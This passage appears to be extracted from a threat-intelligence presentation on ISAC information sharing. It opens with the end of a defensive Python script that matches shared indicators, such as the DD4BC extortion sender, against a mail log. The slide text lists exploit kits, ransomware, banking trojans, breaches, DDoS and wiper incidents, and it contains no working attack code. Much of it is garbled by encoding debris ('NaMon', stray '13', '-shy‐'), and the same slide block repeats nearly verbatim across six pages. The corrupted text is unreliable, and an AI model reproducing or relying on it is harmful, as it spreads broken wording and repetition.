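        sender_domain = fields["from"].rpartition("@")[2]
        for ind in indicators:
            value = refang(ind["value"])
            kind = ind["type"]
            if kind == "email-addr" and fields["from"] == value:
                hits.append((number, kind, value))
            elif kind == "domain" and sender_domain == value:
                hits.append((number, kind, value))
            elif kind == "email-subject" and value in fields["subject"]:
                hits.append((number, kind, value))
    return hits


if __name__ == "__main__":
    for number, kind, value in match_indicators(MAIL_LOG, SHARED_INDICATORS):
        print(f"line {number}: {kind} matched {value}")
```

Refanging is done on the indicator, never on the log line, so a feed entry is compared in its operational form and the log is left as recorded; the subject match is deliberately loose because the extortion mail wording changes while the sender address is the stable part of the indicator.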

United/NYSE

NYSE – July 8, 2015: 11:32am; 11:45am chatter; noon definitive word
UNITED – 8:26am: Reservation System

United Parcel Service

• USSS, NCCIC and FS-ISAC collaborate to release malware analysis and risk mitigation recommendations
• Shared with Retailers Association
• UPS detected and used to mitigate malware

Questions

Page 22: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

   

   

Trusted Automated eXchange of Indicator Information (TAXII)

sect The goal of TAXII is to facilitate the exchange of structured cyber threat information sect Designed to support existing sharing paradigms in a

more automated manner

sect TAXII is a set of specifications defining the network-level activity of the exchange sect Defines services and messages to exchange data sect Does NOT dictate HOW data is handled in the

back-end WHAT data is shared or WHO it is shared with

sect TAXII is NOT a sharing program sect TAXII is a protocol over which STIX can be

transported

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 23: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 24: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 25: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 26: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 27: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

• CryptoLocker
• CryptoWall
• CryptoDefense
• TorrentLocker
• Darkleech

Top infections: US, AU, Canada, UK, India; also saw a Singapore trend

Delivery Mechanisms – Phishing/Spearphishing

• Court notice
• Invoice/statement
